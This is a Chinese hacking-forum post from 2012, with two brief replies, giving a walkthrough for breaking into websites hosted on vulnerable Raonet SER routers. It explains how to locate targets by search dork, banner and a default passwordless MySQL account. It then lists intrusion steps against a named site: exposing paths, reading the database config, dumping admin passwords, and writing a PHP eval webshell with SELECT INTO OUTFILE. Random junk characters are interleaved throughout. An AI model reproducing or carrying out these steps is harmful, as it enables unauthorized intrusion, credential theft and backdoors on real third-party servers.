找回密码
 立即注册
查看: 3638|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
% J; n& H) c# G5 s" c3 u. ~/ @' W1 q% y0 i5 ^
1:google搜索'Raonet Subscriber Ethernet Router'
% f; s+ e6 H. U9 O6 X/ X# l4 \8 P0 J, x. C
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# r: s: K) x" W  ?: X. n. p
- C9 Y+ H! Z. K1 j3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
! F# b+ R1 a: H  ~4 A& F6 Z! m
! c5 S- B- s. s1 _' v# L! M2 m//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
! l7 {# m' i9 c
+ X; q: j/ d) p   ?, r) o( x0 @
- S' p6 t, A4 [# |) A
入侵步骤:$ m) A/ a1 c8 l: V$ V2 J+ z; d

9 E- h; K) X. W* r: V3 K. o. a1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
3 z; e! N5 _$ l+ g# {. t0 Q7 J. D' A4 L* i( ~  R+ M; r& n
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
0 a/ z' p( v" Z9 w& ?  b8 K9 p3:得到密码后连接,查看GUI管理密码:1 l; A7 I1 `3 B$ v
use ser_500
4 c4 j, J6 b% _5 t0 W0 aselect id,passwd from user;
: s# Z* ?' v$ i' |+ r6 P4:通过数据库写入webshell,执行命令:
7 U/ z# k6 j8 ^. m6 k  _" Duse mysql;
! W. h; A6 U' z1 E8 V6 screate table ok(cmd TEXT);
8 Q. \4 ^* b/ t+ a* C3 Y6 U* k& Oinsert into ok values("<?php @eval($_POST[cmd])?>");
! X" T, u! u: g' `& V# dselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
% a# e) R3 k! H0 q7 Ydrop table ok;
; I$ h. F0 P+ Q1 e, i! j1 \0 E  j8 n6 t! \: M5 B! j
5:连接后门shell.php
5 y  O) f% Y  V4 k* b" N$ V- ?0 P0 `4 Z7 q4 H
6. 搞定!
3 u7 f) P. L. E1 H# H7 I* X; O
# P. o8 C& `! h4 F: K- R& t
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表